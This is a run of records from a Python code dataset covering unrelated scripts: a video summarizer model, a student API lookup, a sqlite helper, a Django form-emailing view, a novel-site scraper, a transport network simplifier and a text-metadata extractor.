hidden_size]\n h_mu = self.e_lstm.linear_mu(h)\n h_log_variance = torch.log(self.softplus(self.e_lstm.linear_var(h)))\n\n # [num_layers, 1, hidden_size]\n h = self.reparameterize(h_mu, h_log_variance)\n\n # [seq_len, 1, hidden_size]\n decoded_features = self.d_lstm(seq_len, init_hidden=(h, c))\n\n # [seq_len, 1, hidden_size]\n # reverse\n decoded_features.reverse()\n decoded_features = torch.stack(decoded_features)\n return h_mu, h_log_variance, decoded_features\n\n\nclass Summarizer(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers=2, m=4, video_type='summe'):\n super().__init__()\n self.s_lstm = sLSTM(input_size, hidden_size, num_layers, m, video_type)\n # self.csnet = CSNET(input_size, hidden_size, num_layers)\n self.vae = VAE(input_size, hidden_size, num_layers)\n\n def forward(self, image_features, places365_features, difference_attention, uniform=False):\n # Apply weights\n if not uniform:\n # [seq_len, 1]\n scores = self.s_lstm(image_features, places365_features, difference_attention)\n # scores = self.csnet(image_features, difference_attention)\n # print(scores)\n\n # [seq_len, 1, hidden_size]\n weighted_features = image_features * scores.view(-1, 1, 1)\n else:\n scores = None\n weighted_features = image_features\n\n h_mu, h_log_variance, decoded_features = self.vae(weighted_features)\n\n return scores, h_mu, h_log_variance, decoded_features\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"mcsf-intermediate-fusion/layers/summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"440738179","text":"# -*- coding: utf-8 -*-\nfrom django.conf import settings\nimport requests\n\nfrom django.contrib.auth import get_user_model\n\n\ndef find_student(identifier):\n response = requests.get(\n f'https://kobra.karservice.se/api/v1/students/{identifier}/',\n headers={'Authorization': f'Token {settings.KOBRA_API_TOKEN}'})\n\n if response.status_code == 200:\n return response.json()\n else:\n return None\n\n\ndef create_or_update_user(payload):\n \"\"\"\n Takes a Kobra payload and creates or updates a user in the database.\n \"\"\"\n return get_user_model().objects.update_or_create(\n username=payload['liu_id'],\n defaults=dict(\n email=payload['email'],\n first_name=payload['first_name'],\n last_name=payload['last_name']\n 
))\n","sub_path":"cafesys/baljan/kobra.py","file_name":"kobra.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"112563764","text":"\"\"\"\n 练习:在控制台中录入多个人的喜好\n\n\"\"\"\n\"\"\"\n{\n \"张三\":[”爱好1“,”爱好2“, ”爱好3“]\n}\n\"\"\"\ndict_01 = {}\n\nwhile True:\n name = input(\"请输入姓名:\")\n if name == \"\":\n break\n # dict_01[name] = []\n list_hobby = []\n while True:\n hobby = input(\"请输入爱好:\")\n if hobby == \"\":\n break\n list_hobby.append(hobby)\n dict_01[name] = list_hobby\n\nfor k, value in dict_01.items():\n print(\"姓名:%s 爱好:\" % k, end=\" \")\n for item in value:\n print(item, end=\",\")\n","sub_path":"day06/exo02.py","file_name":"exo02.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"160433215","text":"import argparse\nimport json\nimport logging\nimport os\nimport time\n\nfrom genet import read_matsim\nfrom genet.utils.persistence import ensure_dir\n\nif __name__ == '__main__':\n arg_parser = argparse.ArgumentParser(description='Simplify a MATSim network by removing '\n 'intermediate links from paths')\n\n arg_parser.add_argument('-n',\n '--network',\n help='Location of the network.xml file',\n required=True)\n\n arg_parser.add_argument('-s',\n '--schedule',\n help='Location of the schedule.xml file',\n required=False,\n default=None)\n\n arg_parser.add_argument('-v',\n '--vehicles',\n help='Location of the vehicles.xml file',\n required=False,\n default=None)\n\n arg_parser.add_argument('-p',\n '--projection',\n help='The projection network is in, eg. \"epsg:27700\"',\n required=True)\n\n arg_parser.add_argument('-np',\n '--processes',\n help='The number of processes to split computation across',\n required=False,\n default=1,\n type=int)\n\n arg_parser.add_argument('-od',\n '--output_dir',\n help='Output directory for the simplified network',\n required=True)\n\n args = vars(arg_parser.parse_args())\n network = args['network']\n schedule = args['schedule']\n vehicles = args['vehicles']\n projection = args['projection']\n processes = args['processes']\n output_dir = args['output_dir']\n ensure_dir(output_dir)\n\n logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.WARNING)\n\n logging.info('Reading in network at {}'.format(network))\n n = read_matsim(\n path_to_network=network,\n epsg=projection,\n path_to_schedule=schedule,\n path_to_vehicles=vehicles\n )\n\n logging.info('Simplifying the Network.')\n\n start = time.time()\n n.simplify(no_processes=processes)\n end = time.time()\n\n logging.info(\n f'Simplification resulted in {len(n.link_simplification_map)} links being simplified.')\n with open(os.path.join(output_dir, 'link_simp_map.json'), 'w', encoding='utf-8') as f:\n json.dump(n.link_simplification_map, f, ensure_ascii=False, indent=4)\n\n n.write_to_matsim(output_dir)\n\n logging.info('Generating validation report')\n report = n.generate_validation_report()\n logging.info(f'Graph validation: {report[\"graph\"][\"graph_connectivity\"]}')\n if n.schedule:\n logging.info(f'Schedule level validation: {report[\"schedule\"][\"schedule_level\"][\"is_valid_schedule\"]}')\n logging.info(f'Routing validation: {report[\"routing\"][\"services_have_routes_in_the_graph\"]}')\n\n n.generate_standard_outputs(os.path.join(output_dir, 'standard_outputs'))\n\n logging.info(f'It took {round((end - start)/60, 3)} min to simplify the 
network.')\n","sub_path":"scripts/simplify_network.py","file_name":"simplify_network.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"33544763","text":"import sqlite3\n\n\n\nclass DBConnect:\n def __init__(self):\n self._db = sqlite3.connect(\"informations.db\")\n self._db.row_factory = sqlite3.Row\n self._db.execute(\"create table if not exists Admin(ID integer primary key autoincrement,Name text,Age int)\")\n self._db.commit()\n\n def add_records(self,name,age):\n self._db.row_factory = sqlite3.Row\n # Add records\n self._db.execute(\"insert into Admin(Name,Age) values(?,?)\", (name, age))\n self._db.commit()\n print(\"record is added\")\n def List_Data(self):\n cursor=self._db.execute(\"select * from Admin\")\n for row in cursor:\n print(\"ID = {} ... Name{} .. Age {} \".format(row[\"ID\"],row[\"Name\"],row[\"Age\"]))\n\n def deleteRecord(self,ID):\n self._db.row_factory = sqlite3.Row\n # delete records\n self._db.execute(\"delete from Admin where ID={}\".format(ID))\n self._db.commit()\n print(\"record is deleted\")\n def update (self,ID,age):\n self._db.row_factory = sqlite3.Row\n # update records by name\n self._db.execute(\"update Admin set Age=? where ID=?\",(age,ID))\n self._db.commit()\n print(\"record is updated\")\n","sub_path":"DB_Connect_Class.py","file_name":"DB_Connect_Class.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"492432931","text":"from django.shortcuts import render\nfrom Forms.models import Forms, Fields, Values, Emails,SecondValues\nfrom django.urls import reverse_lazy\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\nfrom django.template.loader import render_to_string\nfrom django.views.generic import CreateView, TemplateView\nfrom validate_email import validate_email\nfrom django.core.exceptions import ValidationError\nfrom django.core.mail import EmailMessage\n\nfrom django.http import HttpResponseForbidden, HttpResponse\nimport threading\nfrom threading import Thread\nimport sys\nfrom project import settings\nimport json\n\n\n\nclass EmailThread(threading.Thread):\n def __init__(self, subject, html_content, email_list):\n self.subject = subject\n self.email_list = email_list\n self.html_content = html_content\n threading.Thread.__init__(self)\n\n def run (self):\n msg = EmailMessage(self.subject, self.html_content, settings.EMAIL_HOST_USER, self.email_list)\n msg.content_subtype = \"html\"\n msg.send()\n\ndef send_html_mail(subject, html_content, email_list):\n EmailThread(subject, html_content, email_list).start()\n\n\nclass FormsMetm(TemplateView):\n model = Fields\n template_name = 'index.html'\n \n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n objects = Forms.objects.filter(pk=context['id']).first()\n context[\"objects\"] = objects\n \n\n return context\n\n \n def post(self, request, *args, **kwargs):\n err_list = []\n context = dict()\n objects = Forms.objects.filter(pk=kwargs['id']).first()\n # print(objects,\"FFFFFFFFFFFFFFFFFFFFFFFFFFf\")\n context[\"objects\"] = objects\n global email_value\n email_value = {}\n # print(self.request.POST[field])\n \n for field in self.request.POST: \n if field == 'csrfmiddlewaretoken':\n continue\n else:\n print(self.request.POST[field],'AAAAAAAAAAAAAAAAAAAAAA')\n \n input_name = field.split(\"-\")\n \n field_id = input_name[1]\n field_label = 
input_name[0]\n                fields = Fields.objects.filter(id=field_id).first().get_type()\n                require = Fields.objects.filter(id=field_id, requirement=True).first()\n                main_field = Fields.objects.filter(label=field_label).first()\n\n                is_valid = False\n                if fields == '1':\n                    a = request.POST.get(field, \"\")\n                    if len(a) == 0 and require:\n                        err_list.append({field_label: 'This field cannot be left blank'})\n                        context[\"err_list\"] = err_list\n\n                if fields == '2':\n                    nomre = request.POST.get(field, \"\")\n                    if len(nomre) == 0 and require:\n                        err_list.append({field_label: 'This field cannot be left blank'})\n                        context[\"err_list\"] = err_list\n\n                    if not nomre.isdigit() and len(nomre) != 0:\n                        err_list.append({field_label: 'Please enter a valid number'})\n                        context[\"err_list\"] = err_list\n\n                if fields == '6' and require:\n                    email = request.POST.get(field, \"\")\n                    if len(email) == 0:\n                        err_list.append({field_label: 'This field cannot be left blank'})\n                        context[\"err_list\"] = err_list\n\n                    is_valid = validate_email(email_address=email, check_regex=True, check_mx=True, from_address='my@from.addr.ess',\n                                              helo_host='localhost', smtp_timeout=10, dns_timeout=10, use_blacklist=True, debug=False)\n                    if not is_valid:\n                        err_list.append({field_label: 'Please enter a valid email address'})\n                        context[\"err_list\"] = err_list\n\n                email = request.POST.get(field, \"\")\n                if fields == '6' and len(email) != 0:\n                    is_valid = validate_email(email_address=email, check_regex=True, check_mx=True, from_address='my@from.addr.ess',\n                                              helo_host='localhost', smtp_timeout=10, dns_timeout=10, use_blacklist=True, debug=False)\n                    if not is_valid:\n                        err_list.append({field_label: 'Please enter a valid email address'})\n                        context[\"err_list\"] = err_list\n\n        if len(err_list) == 0:\n            form = SecondValues(forms=objects,\n                                datas=json.dumps(self.request.POST))\n            form.save()\n\n            for field in self.request.POST:\n                if field == 'csrfmiddlewaretoken':\n                    continue\n                else:\n                    # accumulate every submitted field; assigning a fresh dict here replaced\n                    # the previous entries, so only the last field ended up in the email\n                    email_value[field] = self.request.POST[field]\n            subject = 'Form data'\n            emails = Emails.objects.filter(forms__id=kwargs['id']).values_list('email', flat=True)\n            context = {\n                'value_list': email_value,\n            }\n            template_name = 'email.html'\n            msg = render_to_string(template_name, context)\n            template = msg\n            send_html_mail(subject, template, emails)\n            return render(request, 'index2.html')\n        return render(request, 'index.html', context)\n","sub_path":"project/Forms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"479080403","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom multiprocessing import Pool\n\n\n# Parse one chapter's page\ndef parser_a_chapter(html):\n    # Parse the page\n    soup = BeautifulSoup(html, 'html.parser')\n    title = soup.find('h1', 'readTitle')\n    print(title.get_text())\n    # Get the chapter text\n    div = soup.find(id='htmlContent')\n    text = div.get_text()\n    # Check whether the chapter is split across two pages\n    # ('下一章' is the site's literal \"next chapter\" link text)\n    bnt = soup.find(id='linkNext')\n    if bnt.get_text() != '下一章':\n        text = text + get_a_chapter(bnt['href'])\n    return text\n\n# Fetch one chapter\ndef get_a_chapter(chapter_url):\n    res = requests.get(chapter_url)\n    res.encoding = 'gbk'\n    text = parser_a_chapter(res.text)\n    return text\n\n# Fetch a whole book\ndef get_book(url):\n    res = requests.get(url)\n    res.encoding = 'gbk'\n    soup = BeautifulSoup(res.text, 'html.parser')\n    dd = soup.find_all('dd', 'col-md-3')\n    title = soup.find('h1', 'bookTitle').get_text()\n    print(title)\n    with open(title + 
'.txt', 'a', encoding='utf-8') as f:\n        f.write(title + '\\n')\n        for i in dd:\n            if i.a is not None:\n                text = get_a_chapter(url + i.a['href'])\n                f.write(text + '\\n')\n\n\n# Crawl num index pages; return a list of each page's HTML\ndef get_pages(num):\n    base_url = 'http://www.ddxsw.la/wanben/'\n    ls = []\n    for i in range(num):\n        url = base_url + str(i)\n        res = requests.get(url)\n        ls.append(res.text)\n    return ls\n\n# Parse each index page, collect every book's URL, and return them as a list\ndef parser_index_page(html_ls):\n    ls = []\n    for html in html_ls:\n        soup = BeautifulSoup(html, 'html.parser')\n        table = soup.table\n        for i in table.find_all('a'):\n            if i.get('class') is None:\n                ls.append(i['href'])\n    return ls\n\n\ndef main(url):\n    get_book(url)\n\n\nif __name__ == '__main__':\n    # First fetch num pages of the book index\n    num = 2\n    index_html_ls = get_pages(num)\n    # Then get every book's URL\n    books_url = parser_index_page(index_html_ls)\n    # Finally crawl with multiple processes\n    pool = Pool()\n    pool.map(main, books_url)","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"592642638","text":"from Cube import *\nfrom gui.main_gui import *\n\nclass Debug:\n    cube = Cube(2)\n    move_list = []\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def view(hash):\n        if hash is None:\n            return\n        m = Cube(2)\n        m.state = Cube.decode(hash)\n        g = GUI(cube=m, player=True, width=800, height=600)\n\n        while True:\n            g.update()\n\n    @staticmethod\n    def reset(cube=Cube(2)):\n        Debug.cube = cube\n        Debug.move_list = [((None,None),cube.__hash__())]\n\n    @staticmethod\n    def addMove(move):\n        Debug.move_list.append(move)\n\n    @staticmethod\n    def viewMoves():\n        g = GUI(cube=Debug.cube, width=800, height=600)\n        g.moveList(Debug.move_list)\n\n        while True:\n            g.update()\n\nif __name__ == '__main__':\n    hash = None\n    print(\"Enter the hash: \")\n    Debug.view(int(input()))\n\n    pass\n\n    # Initial setup debug\n    c = Cube(2)\n    c.makeMove((1,1))\n    c.makeMove((2,1))\n    Debug.reset(c)\n\n    # Add moves\n    c.makeMove((2,3))\n    Debug.addMove(((2,3), c.__hash__()))\n    c.makeMove((1,3))\n    Debug.addMove(((1,3), c.__hash__()))\n\n    Debug.viewMoves()\n\n","sub_path":"cubeai/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"113237907","text":"import wikipedia\nfrom wikipedia.exceptions import DisambiguationError\nimport xml.dom.minidom\n\nfrom get_pos import *\nfrom get_vars import *\nimport get_medical_objects\nimport get_structural_objects\nimport get_conceptual_objects\nfrom get_medical_objects import *\nfrom get_structural_objects import *\nfrom get_conceptual_objects import *\n\ndef get_data_store(index, database, operation, args):\n    '''\n    this assembles an index or retrieves it from local storage,\n    filtering by object_types found in the metadata argument\n    '''\n    downloaded = downloads(['data', 'datasets'])\n    if not downloaded:\n        return False\n    av = get_vars()\n    if av:\n        data_store = {}\n        ''' if index or database not passed in, fetch the local db if it exists '''\n        args, filters, metadata, generate_target, generate_source = get_args(args, av)\n        av['metadata'] = metadata if metadata else av['supported_params']\n        for key in metadata:\n            related_metadata = add_related_metadata(key, av)\n            if related_metadata:\n                metadata.extend(related_metadata)\n        metadata = list(set(metadata))\n        if operation == 'build':\n            database = get_local_database('data', None) if not database else database\n            data_store, rows = build_indexes(database, args, filters, av)\n        
elif operation == 'get_database':\n data_store = get_local_database('data', None)\n elif operation == 'get_index':\n data_store = index\n if data_store and metadata:\n new_index = {}\n for key in metadata:\n new_index[key] = data_store[key] if key in data_store else set()\n if new_index:\n return new_index\n return False\n\ndef get_data_from_source(source, keyword, av):\n articles = get_batch(source, 0, keyword, [])\n print('get_data_from_source: get_batch: articles', len(articles))\n if articles:\n if len(articles) > 0:\n data = process_articles(articles, source, keyword, av) \n print('processed articles: data', data)\n if data:\n return data\n return False\n\ndef get_batch(source, start, keyword, articles):\n print('get batch for source', start, keyword, len(articles))\n total = 0\n max_count = 10\n keyword = keyword.replace(' ', '+')\n if source['name'] == 'wiki':\n content, sections, categories = get_content_from_wiki(keyword, av)\n if content and sections and categories:\n new_articles = [content]\n else:\n url = source['url'].replace('', keyword).replace('', str(start)).replace('', str(max_count))\n print('url', url)\n response = requests.get(url)\n if response.content:\n print('response content', response.content)\n if source['response_format'] == 'xml':\n xml_string = xml.dom.minidom.parseString(response.content)\n if xml_string:\n count_tag = xml_string.documentElement.getElementsByTagName(source['count'])\n if count_tag:\n total = int(count_tag[0].childNodes[0].nodeValue)\n new_articles = xml_string.documentElement.getElementsByTagName(source['entries'])\n else:\n new_articles = json.loads(response.content)\n print('new articles', len(new_articles))\n if new_articles:\n if len(new_articles) > 0:\n articles.extend(new_articles) \n if (start + max_count) < total:\n start = start + max_count\n if start < 50:\n return get_batch(source, start, keyword, articles) \n return articles\n return False\n\ndef process_articles(articles, source, keyword, av):\n data = {}\n for article in articles:\n title = None\n article_text = None\n if source['name'] == 'pubchem':\n title, article_text = get_article_from_id(article, source)\n print('found pubchem article', article, 'title', title)\n elif source['name'] == 'wiki':\n title = keyword\n article_text = article\n else:\n title = get_text_from_nodes(article, source['title_element'])\n article_text = get_text_from_nodes(article, source['summary_element'])\n if title and article_text:\n article_lines, av = standard_text_processing(article_text, av)\n if article_lines:\n data[title] = article_lines # article_lines[line][word] = pos\n if data:\n return data\n return False\n\ndef get_article_from_id(id_value, source):\n print('get_article_from_id', id_value)\n if id_value:\n url = ''.join(['https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id=', id_value, '&retmode=xml'])\n response = requests.get(url)\n if response:\n if response.content:\n print('pubmed content', id_value, response.content)\n xml_string = xml.dom.minidom.parseString(response.content)\n if xml_string:\n title = xml_string.documentElement.getElementsByTagName(source['title_element'])[0].childNodes[0].nodeValue\n text = xml_string.documentElement.getElementsByTagName(source['summary_element'])[0].childNodes[0].nodeValue\n print('title', title)\n print('text', text)\n if title and text:\n return title, text\n return False, False\n\ndef get_text_from_nodes(entry, element_name):\n nodes = [node for node in entry.childNodes if node.nodeName == element_name]\n if len(nodes) 
> 0:\n        text = ''.join([subnode.wholeText for node in nodes for subnode in node.childNodes])\n        if len(text) > 0:\n            return text\n    return False\n\ndef add_row(row, index, empty_index, rows):\n    if row:\n        if row != empty_index:\n            for key, val in row.items():\n                if type(val) == dict:\n                    row[key] = '::'.join(['_'.join([k,v]) for k,v in val.items()])\n                elif type(val) == set or type(val) == list:\n                    row[key] = str('::'.join(set(val)))\n                elif type(val) == bool:\n                    row[key] = '1' if val is True else '0'\n                # set.add() mutates in place and returns None, so don't reassign the result\n                index[key].add(row[key])\n            rows.append(row)\n    return index, rows\n\ndef build_indexes(database, args, filters, av):\n    '''\n    - this function indexes data from an api providing articles\n    - if the local database is found, use that as the starting index, otherwise build it\n    '''\n    rows = []\n    empty_index = get_empty_index(av)\n    index = database if database else empty_index if empty_index else None\n    for arg in args:\n        for source in av['sources']:\n            data = get_data_from_source(source, arg, av)\n            if data:\n                for title, article_lines in data.items():\n                    for line, word_map in article_lines.items():\n                        row = get_metadata(line, title, word_map, av)\n                        if row:\n                            index, rows = add_row(row, index, empty_index, rows)\n    if index and rows:\n        write_csv(rows, index.keys(), 'data/rows.csv')\n        return index, rows\n    return False, False\n\ndef get_metadata(line, title, word_map, av):\n    '''\n    this function initializes the row object & populates it with various metadata types:\n    - structural_types to get nouns, verbs, phrases, modifiers, clauses, & relationships\n    - medical_types to get conditions, symptoms, & treatments in the sentence\n    - conceptual_types to get types, strategies & insights\n    '''\n    row = get_empty_index(av)\n    row['line'] = line\n    row['word_map'] = word_map\n    row['original_line'] = line\n    row = replace_names(row, av)\n    row = get_similarity_to_title(title, row)\n    row = get_structural_metadata(row, av)\n    print('\\nrow with structural metadata', row)\n    for metadata_type in ['medical_types', 'conceptual_types']:\n        for object_type in av[metadata_type]:\n            if object_type in av['metadata']:\n                for search_pattern_key in av['computed_pattern_index']:\n                    # check that this data 'strategy', 'treatment' was requested and is supported in pattern_index\n                    print('\\nget metadata', object_type, search_pattern_key)\n                    objects, patterns, av = extract_objects_and_patterns(row, object_type, search_pattern_key, av)\n                    if objects:\n                        if objects[object_type] != row.keys():\n                            row[object_type] = set(row[object_type]).union(set(objects[object_type]))\n                    if patterns:\n                        joined_key = '_'.join([object_type, search_pattern_key])\n                        if joined_key not in row['pattern']:\n                            row['pattern'][joined_key] = set()\n                        for p in patterns:\n                            row['pattern'][joined_key].add(p)\n    print('\\nmedical objects', row)\n    return row\n\ndef extract_objects_and_patterns(row, object_type, search_pattern_key, av):\n    '''\n    - this function finds subsets & objects matching patterns from search_pattern_key patterns in row[object_type] data\n      1. find any matches from search_pattern_key patterns in row[object_type] data\n      2. if pattern matches found in lines,\n        find objects in matches with type-specific logic from find_ function\n      3. 
if no pattern matches found in lines,\n        find objects in lines with type-specific logic from find_ function\n    - object_type is the key in object types supported in av['full_params'] to find: ['treatment', 'condition', 'strategy']\n    - search_pattern_key is the type of av['pattern_index'] patterns to search: ['modifier', 'type', 'role']\n    - object_type may equal search_pattern_key\n    '''\n    object_type = object_type if object_type in row else 'line'\n    if row:\n        # parenthesized: 'and' binds tighter than 'or', so without parens the 'all' case skipped the row check\n        if (object_type in av['metadata'] or av['metadata'] == 'all') and object_type in row:\n            all_patterns = {}\n            all_objects = {}\n            data = row[object_type] if type(row[object_type]) == list else [row[object_type]]\n            for item in data:\n                found_objects, found_patterns, av = get_patterns_and_objects_in_line(item, search_pattern_key, row, object_type, av)\n                if found_patterns:\n                    for pattern_key, patterns in found_patterns.items():\n                        if pattern_key not in all_patterns:\n                            all_patterns[pattern_key] = {}\n                        for pattern, matches in patterns.items():\n                            if pattern not in all_patterns[pattern_key]:\n                                all_patterns[pattern_key][pattern] = set()\n                            all_patterns[pattern_key][pattern] = all_patterns[pattern_key][pattern].union(matches)\n                if not found_objects:\n                    '''\n                    if there are no matches found for object_type patterns,\n                    do a standard object query independent of patterns to apply type-specific logic\n                    '''\n                    found_objects = apply_find_function(object_type, item, row, av)\n                if found_objects:\n                    print('find function objects', object_type, found_objects)\n                    if object_type not in all_objects:\n                        all_objects[object_type] = set()\n                    all_objects[object_type] = all_objects[object_type].union(found_objects)\n            if all_objects or all_patterns:\n                print('extracted objects', all_objects, 'patterns', all_patterns)\n                return all_objects, all_patterns, av\n    return False, False, av\n\ndef get_patterns_and_objects_in_line(line, search_pattern_key, row, object_type, av):\n    ''' the reason we allow search_pattern_key and object_type to differ is to find subset matches\n        example:\n            find 'modifiers' in 'treatment patterns' would have:\n                object_type = 'modifier' and search_pattern_key = 'treatment'\n    '''\n    found_objects = set()\n    found_patterns, av = get_matching_subsets(line, search_pattern_key, av)\n    if found_patterns and object_type != 'pattern':\n        for pattern_type in found_patterns:\n            for pattern, matches in found_patterns[pattern_type].items():\n                ''' filter pattern matches for this type before adding them, with type-specific logic in find_* functions '''\n                ''' note: this is not restricting output to found objects '''\n                for m in matches:\n                    objects_found = apply_find_function(object_type, m, row, av)\n                    if objects_found:\n                        found_objects = found_objects.union(objects_found)\n    if found_patterns or found_objects:\n        return found_objects, found_patterns, av\n    return False, False, av\n\ndef apply_find_function(object_type, subset, row, av):\n    ''' find functions check for objects of object_type in matches list which match pattern\n        - all find object functions need to support params:\n            - subset, row, av\n        - subsets = 'dog of cat', 'cat of dog' (matches for pattern 'x of y')\n    '''\n    function_name = ''.join(['find_', object_type])\n    if function_name in globals():\n        if function_name:\n            if get_structural_objects and get_conceptual_objects and get_medical_objects and get_vars:\n                function = None\n                for package in [get_structural_objects, get_conceptual_objects, get_medical_objects, get_vars]:\n                    try:\n                        function = getattr(package, function_name)\n                    except Exception as e:\n                        continue\n                if function:\n                    
got_objects = function(subset, row, av)\n if got_objects:\n if len(got_objects) > 0:\n return set([item for item in got_objects])\n return False\n\ndef get_structural_metadata(row, av):\n '''\n 1. identifies 'ngram', 'modifier', 'phrase', 'noun_phrase', 'verb_phrase', 'clause', 'subject', 'pattern'\n 2. then assembles conditions of sentence & executes order_clauses on conditions\n 3. then identifies 'relationship' objects from sentence conditions\n verb-noun-phrases should be converted into modifiers\n once you have the nouns/modifiers, you can pick a subject from the noun or modifier\n '''\n print('\\n\\nget_structural_metadata', row)\n keep_ratios = ['extra', 'high', 'none']\n corrected_line = correct(row['line'])\n print('row', row)\n row['line'] = corrected_line if corrected_line else row['line']\n if row['line'] != '':\n generated_patterns, av = get_all_versions(row['line'], 'all', av)\n if generated_patterns:\n print('generated_patterns', generated_patterns)\n for pattern_type, patterns in generated_patterns.items():\n if pattern_type not in row['pattern']:\n row['pattern'][pattern_type] = set()\n if len(patterns) > 0:\n for pattern in patterns:\n print('pattern', pattern)\n row['pattern'][pattern_type].add(pattern)\n word_pos_line = ''.join([x for x in row['line'] if x in av['alphanumeric'] or x in av['clause_analysis_chars']])\n print('\\nword pos line', word_pos_line)\n words = word_pos_line.split(' ')\n new_line = []\n max_words, counts = get_common_words(row['line'], 3, av)\n if max_words and counts:\n row['count'] = counts\n row['common_word'] = max_words\n names = get_names(row['line'])\n if names:\n row['names'] = names\n for i, w in enumerate(words):\n if len(w) > 0:\n pos = row['word_map'][w] if row['word_map'] and w in row['word_map'] else get_nltk_pos(w, av)\n if pos:\n if pos in av['tags']['VC']:\n row['clause_marker'].add(w)\n if pos in av['tags']['ALL_N'] or w in av['alphabet'] or pos == 'N':\n ''' format nouns like 'inhibitor' or 'catalyzer' as a verb '''\n present_verb = conjugate(w, 'VBZ', av)\n if present_verb:\n row['verb'].add(present_verb)\n new_line.append(present_verb)\n else:\n row['noun'].add(w)\n new_line.append(w)\n elif pos in av['tags']['ALL_V'] or pos == 'V':\n ''' dont conjugate '-ing' to preserve verb-noun modifier phrases '''\n present_verb = conjugate(w, 'VBZ', av)\n if present_verb:\n row['verb'].add(present_verb)\n new_line.append(present_verb)\n else:\n row['verb'].add(w)\n new_line.append(w)\n elif pos in av['tags']['D'] or pos == 'D':\n ratio = get_determiner_ratio(w)\n if ratio:\n if ratio in keep_ratios:\n row['det'].add(str(ratio))\n new_line.append(str(ratio))\n elif pos in av['tags']['P'] or pos == 'P':\n row['prep'].add(w)\n new_line.append(w)\n elif pos in av['tags']['C'] or pos == 'C':\n row['conj'].add(w)\n new_line.append(w)\n elif pos in av['tags']['ADV'] or pos in av['tags']['ADJ'] or pos == 'ADJ' or pos in av['tags']['ADV'] or pos in av['tags']['ADV'] or pos == 'ADV':\n row['descriptor'].add(w)\n new_line.append(w)\n else:\n row['taken_out'].add('_'.join([w, str(pos)]))\n else:\n if w in av['alphabet']:\n row['noun'].add(w)\n new_line.append(w)\n row['line'] = ' '.join(new_line) if len(new_line) > 0 else word_pos_line\n print('\\ninterim row', row)\n ngrams = find_ngrams(row['line'], av) # 'even with', 'was reduced', 'subject position'\n if ngrams:\n for k, v in ngrams.items():\n row['ngram'] = row['ngram'].union(v)\n print('\\nngrams', row['ngram'])\n for key, value in row.items():\n print('key', key, value)\n structure_types = 
['modifier', 'phrase', 'verb_phrase', 'noun_phrase', 'clause']\n for i, key in enumerate(structure_types):\n if len(row[key]) > 0:\n objects, patterns, av = extract_objects_and_patterns(row, key, key, av)\n if objects:\n print('\\n\\n\\nobjects', key, objects)\n if key in objects:\n if key == 'verb_phrase':\n for item in objects[key]:\n new_list = []\n for w in item.split(' '):\n pos = get_nltk_pos(w, av)\n if pos:\n present_verb = conjugate(w, 'VBZ', av)\n if present_verb:\n new_list.append(present_verb)\n else:\n new_list.append(w)\n else:\n new_list.append(w)\n if len(new_list) > 0:\n row[key].add(' '.join(new_list))\n elif key == 'subject':\n for item in objects[key]:\n row[key].add(item.split(' ')[0]) # to do: remove trailing verb in 'N V' subject pattern\n elif key == 'clause':\n row[key] = objects[key]\n else:\n print('objects key', key)\n row[key] = set(row[key]).union(set(objects[key]))\n if patterns:\n for pattern_type in patterns:\n if pattern_type not in row['pattern']:\n row['pattern'][pattern_type] = set()\n row['pattern'][pattern_type] = row['pattern'][pattern_type].union(patterns[pattern_type])\n print('\\nafter pattern identification')\n for key, value in row.items():\n print('key', key, value)\n new_row = find_relationship(row['line'], row, av)\n row = new_row if new_row else row\n print('\\nafter relationships', row)\n if len(row['relationship']) > 0:\n objects, patterns, av = extract_objects_and_patterns(row, 'relationship', 'relationship', av)\n if objects:\n if 'relationship' in objects:\n row['relationship'] = row['relationship'].union(set(objects['relationship']))\n if patterns:\n for pattern_key in patterns:\n if pattern_key not in row['pattern']:\n row['pattern'][pattern_key] = set()\n row['pattern'][pattern_key] = row['pattern'][pattern_key].union(patterns[pattern_key])\n if row:\n for key in row:\n print('key', key, row[key])\n return row\n return False\n\ndef assemble_pattern_indexes(object_types):\n all_derived_patterns = get_empty_index(av)\n object_types = object_types if object_types != 'all' else all_derived_patterns.keys()\n for object_type in object_types:\n if object_type in all_derived_patterns:\n print('deriving objects for type', object_type)\n derived_patterns, articles, av = derive_and_store_patterns(object_type, av)\n if derived_patterns:\n for ep in derived_patterns:\n print('derived pattern', ep)\n if object_type not in all_derived_patterns:\n all_derived_patterns[object_type] = set()\n all_derived_patterns[object_type].add(ep)\n if all_derived_patterns:\n return all_derived_patterns\n return False\n\nif sys.argv:\n index = get_data_store(None, None, 'build', sys.argv)\n print('get_data_store:index', index)\n\n","sub_path":"find_existing_solutions/get_metadata.py","file_name":"get_metadata.py","file_ext":"py","file_size_in_byte":22933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"20308283","text":"\n#Name: Jaron Huang\n#Date: Augsut 30, 2018\n#This program prints out the length and percentage of GC in a DNA 